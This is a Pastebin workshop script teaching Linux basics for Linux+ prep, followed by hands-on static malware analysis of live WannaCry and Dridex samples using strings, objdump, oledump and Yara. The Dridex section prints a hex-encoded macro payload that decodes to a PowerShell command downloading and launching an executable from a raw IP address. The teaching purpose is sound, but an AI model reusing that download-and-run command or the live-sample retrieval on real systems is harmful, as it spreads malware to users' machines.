Advertisement
joemccray

Linux for InfoSec Pros & Linux+ Exam Prep

Jul 5th, 2017
3,861
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ###############################################################
  2. # InfoSecAddicts Intro to Linux & Comptia Linux+ Exam Prep #
  3. # By Joe McCray #
  4. ###############################################################
  5.  
  6.  
  7.  
  8. ##########
  9. # VMWare #
  10. ##########
  11. - For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
  12.  
  13. - http://www.vmware.com/ap/products/player.html
  14.  
  15.  
  16. - Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
  17.  
  18.  
  19. ##########################
  20. # Download the attack VM #
  21. ##########################
  22. https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
  23. user: infosecaddicts
  24. pass: infosecaddicts
  25.  
  26. - Here is a good set of slides for getting started with Linux:
  27. http://www.slideshare.net/olafusimichael/linux-training-24086319
  28.  
  29.  
  30. - Here is a good tutorial that you should complete before doing the labs below:
  31. http://linuxsurvival.com/linux-tutorial-introduction/
  32.  
  33.  
  34. - Log in to your Ubuntu host with the following credentials:
  35. user: infosecaddicts
  36. pass: infosecaddicts
  37.  
  38.  
  39.  
  40. - I prefer to use Putty to SSH into my Ubuntu host on pentests and I'll be teaching this class in the same manner that I do pentests.
  41. - You can download Putty from here:
  42. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  43.  
  44.  
  45. - For the purpose of this workshop 192.168.230.128 is my Ubuntu IP address so anytime you see that IP you'll know that's my Ubuntu host
  46.  
  47.  
  48.  
  49. ########################
  50. # Basic Linux Commands #
  51. ########################
  52.  
  53. ---------------------------Type This-----------------------------------
  54. cd ~
  55.  
  56. pwd
  57.  
  58. whereis pwd
  59.  
  60. which pwd
  61.  
  62. sudo find / -name pwd
  63.  
  64. /bin/pwd
  65.  
  66. mkdir LinuxBasics
  67.  
  68. cd LinuxBasics
  69.  
  70. touch one two three
  71.  
  72. ls -l t (without pressing the Enter key, press the Tab key twice. What happens?)
  73.  
  74. h (and again without pressing the Enter key, press the Tab key twice. What happens?)
  75.  
  76. Press the 'Up arrow key' (What happens?)
  77.  
  78. Press 'Ctrl-A' (What happens?)
  79.  
  80. ls
  81.  
  82. clear (What happens?)
  83.  
  84. echo one > one
  85.  
  86. cat one (What happens?)
  87.  
  88. man cat (What happens?)
  89. q
  90.  
  91. cat two
  92.  
  93. cat one > two
  94.  
  95. cat two
  96.  
  97. cat one two > three
  98.  
  99. cat three
  100.  
  101. echo four >> three
  102.  
  103. cat three (What happens?)
  104.  
  105. wc -l three
  106.  
  107. man wc
  108. q
  109.  
  110. info wc
  111. q
  112.  
  113. cat three | grep four
  114.  
  115. cat three | grep one
  116.  
  117. man grep
  118. q
  119.  
  120.  
  121. man ps
  122. q
  123.  
  124. ps
  125.  
  126. ps aux
  127.  
  128. ps aux | less
  129.  
  130. Press the 'Up arrow key' (What happens?)
  131.  
  132. Press the 'Down arrow key' (What happens?)
  133. q
  134.  
  135. top
  136. q
  137. -----------------------------------------------------------------------
  138.  
  139.  
  140. #########
  141. # Files #
  142. #########
  143. ---------------------------Type This-----------------------------------
  144. cd ~
  145.  
  146. pwd
  147.  
  148. ls
  149.  
  150. cd LinuxBasics
  151.  
  152. pwd
  153.  
  154. cd ~
  155.  
  156. pwd
  157.  
  158. cd LinuxBasics
  159.  
  160. ls
  161.  
  162. mkdir files
  163.  
  164. cp one files/
  165.  
  166. ls files/
  167.  
  168. cd files/
  169.  
  170. cp ../two .
  171.  
  172. ls
  173.  
  174. cp ../three .
  175.  
  176. ls
  177.  
  178. tar cvf files.tar *
  179.  
  180. ls
  181.  
  182. gzip files.tar
  183.  
  184. ls
  185.  
  186. rm -rf one two three
  187.  
  188. ls
  189.  
  190. tar -zxvf files.tar.gz
  191.  
  192. rm -rf files.tar.gz
  193.  
  194. sudo apt install -y zip unzip
  195.  
  196. zip data *
  197.  
  198. unzip -l data.zip
  199.  
  200. unzip data.zip -d /tmp
  201. -----------------------------------------------------------------------
  202.  
  203.  
  204.  
  205. ############
  206. # VIM Demo #
  207. ############
  208. ---------------------------Type This-----------------------------------
  209. cd ~
  210. sudo apt install -y vim
  211. infosecaddicts
  212.  
  213. cd LinuxBasics
  214.  
  215. mkdir vimlesson
  216.  
  217. cd vimlesson
  218.  
  219. vi lesson1.sh
  220.  
  221. i (press "i" to get into INSERT mode and then paste in the lines below)
  222.  
  223. #!/bin/bash
  224.  
  225. echo "This is my first time using vi to create a shell script"
  226. echo " "
  227. echo " "
  228. echo " "
  229. sleep 5
  230. echo "Ok, now let's clear the screen"
  231. sleep 3
  232. clear
  233.  
  234.  
  235. ---------------don't put this line in your script----------------------------
  236.  
  237. ESC (press the ESC key to get you out of INSERT mode)
  238.  
  239. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  240.  
  241.  
  242. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  243.  
  244.  
  245.  
  246. vi lesson1.sh
  247.  
  248. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  249.  
  250. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  251.  
  252. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  253.  
  254.  
  255.  
  256.  
  257. vi lesson1.sh
  258.  
  259. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  260.  
  261. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  262.  
  263.  
  264. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  265.  
  266. /echo (typing "/echo" immediately after SHIFT: will search the file for the word echo).
  267.  
  268. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  269.  
  270. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  271.  
  272.  
  273.  
  274.  
  275. vi lesson1.sh
  276.  
  277. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  278.  
  279. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  280.  
  281.  
  282. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  283.  
  284. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  285.  
  286. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  287.  
  288. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  289.  
  290.  
  291.  
  292.  
  293. vi lesson1.sh
  294.  
  295. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  296.  
  297. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  298.  
  299.  
  300. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  301.  
  302. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  303.  
  304. dd (typing "dd" will delete the line that you are on)
  305.  
  306. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  307.  
  308. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  309.  
  310.  
  311.  
  312.  
  313. vi lesson1.sh
  314.  
  315. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  316.  
  317. set number (typing "set number" immediately after SHIFT: will add line numbers to vim).
  318.  
  319.  
  320. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  321.  
  322. 4 (typing "4" immediately after SHIFT: will take you to line number 4).
  323.  
  324. dd (typing "dd" will delete the line that you are on)
  325.  
  326. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  327.  
  328. syntax on (typing "syntax on" immediately after SHIFT: will turn on syntax highlighting
  329.  
  330. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  331.  
  332. set tabstop=5 (typing "set tabstop=5" immediately after SHIFT: will set your tabs to 5 spaces
  333.  
  334. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  335.  
  336. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  337.  
  338.  
  339.  
  340.  
  341. vi .vimrc
  342. i (press "i" to get into INSERT mode and then paste in the lines below)
  343.  
  344.  
  345. set number
  346. syntax on
  347. set tabstop=5
  348.  
  349. ESC (press the ESC key to get you out of INSERT mode)
  350.  
  351. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  352.  
  353. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  354.  
  355.  
  356.  
  357.  
  358.  
  359.  
  360. vi lesson1.sh
  361.  
  362. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  363.  
  364. echo $MYVIMRC (typing "echo $MYVIMRC" immediately after SHIFT: will display the path to your new .vimrc file
  365.  
  366. [SHIFT+:] (press SHIFT and the : keys at the same time and you should see a : in the bottom left corner of the screen.
  367.  
  368. wq (typing "wq" immediately after SHIFT: will save (w for write, and q for quit meaning exit vim).
  369. -----------------------------------------------------------------------
  370.  
  371. ###############
  372. # Permissions #
  373. ###############
  374. ---------------------------Type This-----------------------------------
  375. cd ~
  376.  
  377. pwd
  378.  
  379. ls
  380.  
  381. cd LinuxBasics
  382.  
  383. ls -l one
  384. -----------------------------------------------------------------------
  385. We can determine a lot from examining the results of this command. The file "one" is owned by user "me".
  386. Now "me" has the right to read and write this file.
  387. The file is owned by the group "me". Members of the group "me" can also read and write this file.
  388. Everybody else can read this file
  389.  
  390.  
  391. ---------------------------Type This-----------------------------------
  392. ls -l /bin/bash
  393. -----------------------------------------------------------------------
  394.  
  395. Here we can see:
  396.  
  397. The file "/bin/bash" is owned by user "root". The superuser has the right to read, write, and execute this file.
  398. The file is owned by the group "root". Members of the group "root" can also read and execute this file. Everybody else can read and execute this file
  399.  
  400.  
  401. The next command you need to know is "chmod"
  402. rwx rwx rwx = 111 111 111
  403. rw- rw- rw- = 110 110 110
  404. rwx --- --- = 111 000 000
  405.  
  406. and so on...
  407.  
  408. rwx = 111 in binary = 7
  409. rw- = 110 in binary = 6
  410. r-x = 101 in binary = 5
  411. r-- = 100 in binary = 4
  412.  
  413.  
  414. ---------------------------Type This-----------------------------------
  415. ls -l one
  416.  
  417. chmod 600 one
  418.  
  419. ls -l one
  420.  
  421. sudo useradd testuser
  422. infosecaddicts
  423.  
  424. sudo passwd testuser
  425.  
  426. testuser
  427. testuser
  428.  
  429. sudo chown testuser one
  430. infosecaddicts
  431.  
  432. ls -l one
  433.  
  434. sudo chgrp testuser one
  435. infosecaddicts
  436.  
  437. ls -l one
  438.  
  439. id
  440.  
  441. su testuser
  442. testuser
  443. -----------------------------------------------------------------------
  444.  
  445. Here is a table of numbers that covers all the common settings. The ones beginning with "7" are used with programs (since they enable execution) and the rest are for other kinds of files.
  446.  
  447. Value Meaning
  448. 777 (rwxrwxrwx) No restrictions on permissions. Anybody may do anything. Generally not a desirable setting.
  449.  
  450. 755 (rwxr-xr-x) The file's owner may read, write, and execute the file. All others may read and execute the file. This setting is common for programs that are used by all users.
  451.  
  452. 700 (rwx------) The file's owner may read, write, and execute the file. Nobody else has any rights. This setting is useful for programs that only the owner may use and must be kept private from others.
  453.  
  454. 666 (rw-rw-rw-) All users may read and write the file.
  455.  
  456. 644 (rw-r--r--) The owner may read and write a file, while all others may only read the file. A common setting for data files that everybody may read, but only the owner may change.
  457.  
  458. 600 (rw-------) The owner may read and write a file. All others have no rights. A common setting for data files that the owner wants to keep private.
  459.  
  460.  
  461.  
  462. Directory permissions
  463. ---------------------
  464. The chmod command can also be used to control the access permissions for directories. In most ways, the permissions scheme for directories works the same way as they do with files. However, the execution permission is used in a different way. It provides control for access to file listing and other things. Here are some useful settings for directories:
  465.  
  466. Value Meaning
  467. 777 (rwxrwxrwx) No restrictions on permissions.
  468. Anybody may list files, create new files in the directory and delete files in the directory.
  469. Generally not a good setting.
  470.  
  471.  
  472.  
  473. 755 (rwxr-xr-x) The directory owner has full access.
  474. All others may list the directory, but cannot create files nor delete them.
  475. This setting is common for directories that you wish to share with other users.
  476.  
  477.  
  478.  
  479. 700 (rwx------) The directory owner has full access. Nobody else has any rights. This setting is useful for directories that only the owner may use and must be kept private from others.
  480.  
  481. ######################
  482. # Process Management #
  483. ######################
  484. ---------------------------Type This-----------------------------------
  485. top
  486.  
  487. sudo apt install -y htop
  488. infosecaddicts
  489.  
  490. htop
  491.  
  492. ps
  493.  
  494. ps aux
  495.  
  496. ps -A
  497.  
  498. ps -A | less
  499.  
  500. ps axjf
  501.  
  502. pstree
  503.  
  504. pstree -A
  505.  
  506. pgrep bash
  507.  
  508. pgrep init
  509.  
  510. ps aux | grep apache
  511. -----------------------------------------------------------------------
  512.  
  513.  
  514.  
  515. You can list all of the signals that are possible to send with kill by typing:
  516. ---------------------------Type This-----------------------------------
  517. kill -l
  518.  
  519. sudo kill -HUP pid_of_apache
  520.  
  521. The pkill command works in almost exactly the same way as kill, but it operates on a process name instead:
  522.  
  523. pkill -9 ping
  524. The above command is the equivalent of:
  525.  
  526. kill -9 `pgrep ping`
  527. -----------------------------------------------------------------------
  528.  
  529.  
  530.  
  531.  
  532. ####################
  533. # MD5 Hashing Demo #
  534. ####################
  535. ---------------------------Type This-----------------------------------
  536. cd ~/LinuxBasics
  537. mkdir hashdemo
  538. cd hashdemo
  539. echo test > test.txt
  540. cat test.txt
  541. md5sum test.txt
  542. echo hello >> test.txt
  543. cat test.txt
  544. md5sum test.txt
  545. cd ..
  546. -----------------------------------------------------------------------
  547.  
  548.  
  549.  
  550. #################################
  551. # Symmetric Key Encryption Demo #
  552. #################################
  553. ---------------------------Type This-----------------------------------
  554. cd ~/LinuxBasics
  555. mkdir gpgdemo
  556. cd gpgdemo
  557. echo test > test.txt
  558. cat test.txt
  559. gpg -c test.txt
  560. password
  561. password
  562. ls | grep test
  563. cat test.txt
  564. cat test.txt.gpg
  565. rm -rf test.txt
  566. ls | grep test
  567. gpg -o output.txt test.txt.gpg
  568. password
  569. cat output.txt
  570. -----------------------------------------------------------------------
  571.  
  572.  
  573.  
  574. #########################################################################################################################
  575. # Asymmetric Key Encryption Demo #
  576. # #
  577. # Configure random number generator #
  578. # https://www.howtoforge.com/helping-the-random-number-generator-to-gain-enough-entropy-with-rng-tools-debian-lenny #
  579. #########################################################################################################################
  580. ---------------------------Type This-----------------------------------
  581. sudo apt install -y rng-tools
  582. infosecaddicts
  583.  
  584. sudo /etc/init.d/rng-tools start
  585.  
  586. sudo rngd -r /dev/urandom
  587. infosecaddicts
  588.  
  589.  
  590. echo hello > file1.txt
  591. echo goodbye > file2.txt
  592. echo green > file3.txt
  593. echo blue > file4.txt
  594.  
  595. tar czf files.tar.gz *.txt
  596.  
  597. gpg --gen-key
  598. 1
  599. 1024
  600. 0
  601. y
  602. John Doe
  603. john@doe.com
  604. --blank comment--
  605. O
  606. password
  607. password
  608.  
  609.  
  610.  
  611. gpg --armor --output file-enc-pubkey.txt --export 'John Doe'
  612.  
  613. cat file-enc-pubkey.txt
  614.  
  615. gpg --armor --output file-enc-privkey.asc --export-secret-keys 'John Doe'
  616.  
  617. cat file-enc-privkey.asc
  618.  
  619. gpg --encrypt --recipient 'John Doe' files.tar.gz
  620.  
  621. rm -rf files.tar.gz *.txt
  622.  
  623. ls
  624.  
  625. tar -zxvf files.tar.gz.gpg
  626.  
  627. gpg --output output.tar.gz --decrypt files.tar.gz.gpg
  628. password
  629.  
  630. tar -zxvf output.tar.gz
  631.  
  632. ls
  633. -----------------------------------------------------------------------
  634.  
  635.  
  636.  
  637.  
  638. ############################
  639. # Encryption using OpenSSL #
  640. ############################
  641. ---------------------------Type This-----------------------------------
  642. openssl genrsa -out private_key.pem 1024
  643.  
  644. openssl rsa -in private_key.pem -out public_key.pem -outform PEM -pubout
  645.  
  646.  
  647. echo hello > encrypt.txt
  648. openssl rsautl -encrypt -inkey public_key.pem -pubin -in encrypt.txt -out encrypt.dat
  649.  
  650. cat encrypt.dat
  651.  
  652. rm -rf encrypt.txt
  653.  
  654. ls
  655.  
  656. openssl rsautl -decrypt -inkey private_key.pem -in encrypt.dat -out decrypt.txt
  657.  
  658. cat decrypt.txt
  659. -----------------------------------------------------------------------
  660.  
  661.  
  662. ###############################
  663. # Secure File/Folder Deletion #
  664. ###############################
  665. ---------------------------Type This-----------------------------------
  666. sudo apt install -y secure-delete
  667.  
  668. wget https://www.sans.org/security-resources/tcpip.pdf
  669.  
  670. file tcpip.pdf
  671.  
  672. sudo srm tcpip.pdf
  673.  
  674. wget https://www.sans.org/security-resources/tcpip.pdf
  675.  
  676. shred tcpip.pdf
  677.  
  678. wget https://www.sans.org/security-resources/tcpip.pdf
  679. -----------------------------------------------------------------------
  680.  
  681.  
  682.  
  683.  
  684.  
  685.  
  686.  
  687.  
  688. ##############################################
  689. # Log Analysis with Linux command-line tools #
  690. ##############################################
  691. - The following command line executables are found in the Mac as well as most Linux Distributions.
  692.  
  693. cat – prints the content of a file in the terminal window
  694. grep – searches and filters based on patterns
  695. awk – can sort each row into fields and display only what is needed
  696. sed – performs find and replace functions
  697. sort – arranges output in an order
  698. uniq – compares adjacent lines and can report, filter or provide a count of duplicates
  699.  
  700.  
  701.  
  702.  
  703.  
  704. ##############
  705. # Cisco Logs #
  706. ##############
  707. ---------------------------Type This-----------------------------------
  708. wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
  709. -----------------------------------------------------------------------
  710.  
  711.  
  712. AWK Basics
  713. ----------
  714. - To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
  715. ---------------------------Type This-----------------------------------
  716. cat cisco.log | awk '{print $5}' | tail -n 4
  717. -----------------------------------------------------------------------
  718.  
  719.  
  720.  
  721. - Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
  722. ---------------------------Type This-----------------------------------
  723. cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
  724. -----------------------------------------------------------------------
  725.  
  726.  
  727.  
  728. - While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
  729. ---------------------------Type This-----------------------------------
  730. cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
  731. -----------------------------------------------------------------------
  732.  
  733.  
  734.  
  735.  
  736. - Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
  737. ---------------------------Type This-----------------------------------
  738. cat cisco.log | grep %LINEPROTO-5-UPDOWN:
  739.  
  740. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
  741.  
  742. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
  743.  
  744. cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
  745. -----------------------------------------------------------------------
  746.  
  747.  
  748. ################
  749. # The Scenario #
  750. ################
  751. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
  752.  
  753.  
  754. The fastest thing you can do is perform static analysis.
  755.  
  756.  
  757.  
  758. ###################
  759. # Static Analysis #
  760. ###################
  761.  
  762. - After logging please open a terminal window and type the following commands:
  763. ---------------------------Type This-----------------------------------
  764. cd Desktop/
  765. -----------------------------------------------------------------------
  766.  
  767. - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
  768.  
  769. ---------------------------Type This-----------------------------------
  770. cd ~/Desktop/
  771. wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
  772. wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
  773.  
  774. unzip malware-password-is-infected.zip
  775. infected
  776.  
  777. file malware.exe
  778.  
  779. mv malware.exe malware.pdf
  780.  
  781. file malware.pdf
  782.  
  783. mv malware.pdf malware.exe
  784.  
  785. hexdump -n 2 -C malware.exe
  786. -----------------------------------------------------------------------
  787.  
  788.  
  789. ***What is '4d 5a' or 'MZ'***
  790. Reference:
  791. http://www.garykessler.net/library/file_sigs.html
  792.  
  793. ---------------------------Type This-----------------------------------
  794. objdump -x malware.exe
  795.  
  796. strings malware.exe
  797.  
  798. strings --all malware.exe | head -n 6
  799.  
  800. strings malware.exe | grep -i dll
  801.  
  802. strings malware.exe | grep -i library
  803.  
  804. strings malware.exe | grep -i reg
  805.  
  806. strings malware.exe | grep -i hkey
  807.  
  808. strings malware.exe | grep -i hku
  809. -----------------------------------------------------------------------
  810. - We didn't see anything like HKLM, HKCU or other registry type stuff
  811.  
  812.  
  813. ---------------------------Type This-----------------------------------
  814. strings malware.exe | grep -i irc
  815.  
  816. strings malware.exe | grep -i join
  817.  
  818. strings malware.exe | grep -i admin
  819.  
  820. strings malware.exe | grep -i list
  821. -----------------------------------------------------------------------
  822.  
  823. - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
  824.  
  825. ---------------------------Type This-----------------------------------
  826. sudo apt-get install -y python-pefile
  827. malware
  828.  
  829. vi analyse_malware.py
  830.  
  831. python analyse_malware.py malware.exe
  832. -----------------------------------------------------------------------
  833.  
  834.  
  835.  
  836.  
  837. ################################
  838. # Good references for WannaCry #
  839. ################################
  840.  
  841. References:
  842.  
  843. https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
  844. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  845. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  846.  
  847.  
  848.  
  849. - After logging please open a terminal window and type the following commands:
  850. ---------------------------Type This-----------------------------------
  851. cd Desktop/
  852.  
  853. wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
  854.  
  855. unzip wannacry.zip
  856. infected
  857.  
  858. file wannacry.exe
  859.  
  860. mv wannacry.exe malware.pdf
  861.  
  862. file malware.pdf
  863.  
  864. mv malware.pdf wannacry.exe
  865.  
  866. hexdump -n 2 -C wannacry.exe
  867. -----------------------------------------------------------------------
  868.  
  869.  
  870.  
  871. ***What is '4d 5a' or 'MZ'***
  872. Reference:
  873. http://www.garykessler.net/library/file_sigs.html
  874.  
  875.  
  876.  
  877.  
  878. ---------------------------Type This-----------------------------------
  879. objdump -x wannacry.exe
  880.  
  881. strings wannacry.exe
  882.  
  883. strings --all wannacry.exe | head -n 6
  884.  
  885. strings wannacry.exe | grep -i dll
  886.  
  887. strings wannacry.exe | grep -i library
  888.  
  889. strings wannacry.exe | grep -i reg
  890.  
  891. strings wannacry.exe | grep -i key
  892.  
  893. strings wannacry.exe | grep -i rsa
  894.  
  895. strings wannacry.exe | grep -i open
  896.  
  897. strings wannacry.exe | grep -i get
  898.  
  899. strings wannacry.exe | grep -i mutex
  900.  
  901. strings wannacry.exe | grep -i irc
  902.  
  903. strings wannacry.exe | grep -i join
  904.  
  905. strings wannacry.exe | grep -i admin
  906.  
  907. strings wannacry.exe | grep -i list
  908. -----------------------------------------------------------------------
  909.  
  910.  
  911.  
  912.  
  913.  
  914.  
  915.  
  916.  
  917.  
  918.  
  919. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
  920.  
  921. Quick Google search for "wannacry ransomeware analysis"
  922.  
  923.  
  924. Reference
  925. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
  926.  
  927. - Yara Rule -
  928.  
  929.  
  930. Strings:
  931. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
  932. $s2 = “Wanna Decryptor” wide ascii nocase
  933. $s3 = “.wcry” wide ascii nocase
  934. $s4 = “WANNACRY” wide ascii nocase
  935. $s5 = “WANACRY!” wide ascii nocase
  936. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
  937.  
  938.  
  939.  
  940.  
  941.  
  942.  
  943.  
  944.  
  945. Ok, let's look for the individual strings
  946.  
  947.  
  948. ---------------------------Type This-----------------------------------
  949. strings wannacry.exe | grep -i ooops
  950.  
  951. strings wannacry.exe | grep -i wanna
  952.  
  953. strings wannacry.exe | grep -i wcry
  954.  
  955. strings wannacry.exe | grep -i wannacry
  956.  
  957. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
  958. -----------------------------------------------------------------------
  959.  
  960.  
  961.  
  962.  
  963.  
  964.  
  965. ####################################
  966. # Tired of GREP - let's try Python #
  967. ####################################
  968. Decided to make my own script for this kind of stuff in the future. I
  969.  
  970. Reference1:
  971. https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
  972.  
  973. This is a really good script for the basics of static analysis
  974.  
  975. Reference:
  976. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
  977.  
  978.  
  979. This is really good for showing some good signatures to add to the Python script
  980.  
  981.  
  982. Here is my own script using the signatures (started this yesterday, but still needs work):
  983. https://pastebin.com/guxzCBmP
  984.  
  985.  
  986.  
  987. ---------------------------Type This-----------------------------------
  988. sudo apt install -y python-pefile
  989. infosecaddicts
  990.  
  991.  
  992.  
  993. wget https://pastebin.com/raw/guxzCBmP
  994.  
  995.  
  996. mv guxzCBmP am.py
  997.  
  998.  
  999. vi am.py
  1000.  
  1001. python am.py wannacry.exe
  1002. -----------------------------------------------------------------------
  1003.  
  1004.  
  1005.  
  1006.  
  1007.  
  1008.  
  1009.  
  1010. Building a Malware Scanner
  1011. --------------------------
  1012.  
  1013. ---------------------------Type This-----------------------------------
  1014. mkdir ~/Desktop/malwarescanner
  1015.  
  1016. cd ~/Desktop/malwarescanner
  1017.  
  1018. wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
  1019.  
  1020. unzip master.zip
  1021.  
  1022. cd malwarescanner-master/
  1023.  
  1024. python scanner.py -h
  1025.  
  1026. cat strings.txt
  1027.  
  1028. cat hashes.txt
  1029.  
  1030. mkdir ~/Desktop/malcode
  1031.  
  1032. cp ~/Desktop/malware.exe ~/Desktop/malcode
  1033.  
  1034. python scanner.py -H hashes.txt -D ~/Desktop/malcode/ strings.txt
  1035.  
  1036. cd ~/Desktop/
  1037. -----------------------------------------------------------------------
  1038.  
  1039.  
  1040. #####################################################
  1041. # Analyzing Macro Embedded Malware #
  1042. # Reference: #
  1043. # https://jon.glass/analyzes-dridex-malware-p1/ #
  1044. #####################################################
  1045. ---------------------------Type This-----------------------------------
  1046. cd ~/Desktop/
  1047.  
  1048.  
  1049. sudo pip install olefile
  1050.  
  1051.  
  1052. mkdir ~/Desktop/oledump
  1053.  
  1054. cd ~/Desktop/oledump
  1055.  
  1056. wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
  1057.  
  1058. unzip oledump_V0_0_22.zip
  1059.  
  1060. wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
  1061.  
  1062. unzip 064016.zip
  1063. infected
  1064.  
  1065. python oledump.py 064016.doc
  1066.  
  1067. python oledump.py 064016.doc -s A4 -v
  1068. -----------------------------------------------------------------------
  1069.  
  1070.  
  1071.  
  1072. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
  1073. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
  1074.  
  1075. ---------------------------Type This-----------------------------------
  1076. python oledump.py 064016.doc -s A5 -v
  1077. -----------------------------------------------------------------------
  1078.  
  1079. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
  1080.  
  1081. ---------------------------Type This-----------------------------------
  1082. python oledump.py 064016.doc -s A3 -v
  1083.  
  1084. - Look for "GVhkjbjv" and you should see:
  1085.  
  1086. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
  1087.  
  1088. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
  1089. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
  1090.  
  1091.  
  1092.  
  1093.  
  1094. ##############
  1095. # Yara Ninja #
  1096. ##############
  1097. ---------------------------Type This-----------------------------------
  1098. sudo apt-get remove -y yara
  1099.  
  1100.  
  1101. wget https://github.com/plusvic/yara/archive/v3.4.0.zip
  1102.  
  1103. sudo apt-get -y install libtool
  1104.  
  1105.  
  1106. unzip v3.4.0.zip
  1107.  
  1108. cd yara-3.4.0
  1109.  
  1110. ./bootstrap.sh
  1111.  
  1112. ./configure
  1113.  
  1114. make
  1115.  
  1116. sudo make install
  1117.  
  1118.  
  1119. yara -v
  1120.  
  1121. cd ..
  1122.  
